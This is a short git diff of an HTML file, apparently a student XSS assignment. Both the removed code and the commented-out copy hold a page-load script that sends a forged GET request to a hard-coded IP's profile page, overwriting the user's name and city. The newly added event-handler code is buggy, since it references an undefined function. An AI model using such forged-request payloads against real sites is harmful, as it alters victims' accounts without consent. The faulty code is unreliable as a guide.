--- a/xss.html
+++ b/xss.html
@@ -1,21 +1,29 @@
 <!DOCTYPE html>
 <html>
 <script>
-window.onload = function () {
-    try
-    {
-        alert("HEY 1");
-        var xmlHttp = null;
+function doStuff() {
+    alert("HEY");
+}
 
-        xmlHttp = new XMLHttpRequest();
-        xmlHttp.open( "GET", "http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update", false );
-        xmlHttp.send( null );
-        alert("HEY 2");
-    }
-    catch(err)
-    {
-        alert(err);
-    }
+window.addEventListener ? 
+window.addEventListener("load",yourFunction,false) : 
+window.attachEvent && window.attachEvent("onload",doStuff());
+
+//document.onload = function () {
+    //try
+  //  {
+    //    alert("HEY 1");
+      //  var xmlHttp = null;
+
+        //xmlHttp = new XMLHttpRequest();
+        //xmlHttp.open( "GET", "http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update", false );
+        //xmlHttp.send( null );
+        //alert("HEY 2");
+    //}
+    //catch(err)
+    //{
+      //  alert(err);
+    //}
 }
 </script>
 <body>
